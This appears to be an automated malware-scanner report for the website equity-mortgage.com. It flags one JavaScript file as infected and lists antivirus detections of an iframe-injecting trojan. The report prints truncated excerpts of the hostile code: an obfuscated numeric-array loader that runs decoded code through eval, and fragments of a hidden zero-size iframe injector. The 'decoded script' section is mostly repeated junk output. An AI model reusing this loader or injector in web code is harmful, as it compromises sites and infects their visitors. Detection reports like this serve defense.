New scan:

Malware Scanner report for equity-mortgage.com

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "equity-mortgage.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=equity-mortgage.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://equity-mortgage.com/
200 OK
Content-Length: 9267
Content-Type: text/html
clean
http://equity-mortgage.com/GeneratedItems/CSScriptLib.js
200 OK
Content-Length: 9596
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

CSInit = new Array;
CSExit = new Array;
CSStopExecution=false;
function CSAction(array) {return CSAction2(CSAct, array);}
function CSAction2(fct, array) {
var result;
for (var i=0;i<array.length;i++) {
if(CSStopExecution) return false;
var aa = fct[array[i]];
if (aa == null) return false;
var ta = new Array;
for(var j=1;j<aa.length;j++) {
if((aa[j]!=null)&&(typeof(aa[j])=="object")&&(aa[j].length==2)){

... 3341 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
... 32997 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
MicroWorld-eScan
JS:Trojan.Iframer.C
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://equity-mortgage.com/../GeneratedItems/CSScriptLib.js
400 Bad Request
Content-Length: 1024
Content-Type: text/html
clean
http://equity-mortgage.com/test404page.js
404 Not Found
Content-Length: 963
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: equity-mortgage.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 17:08:04 GMT
Accept-Ranges: bytes
Server: Apache
Content-Type: text/html
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: equity-mortgage.com
Referer: http://www.google.com/search?q=equity-mortgage.com

Result:
The result is similar to the first query. There are no suspicious redirects found.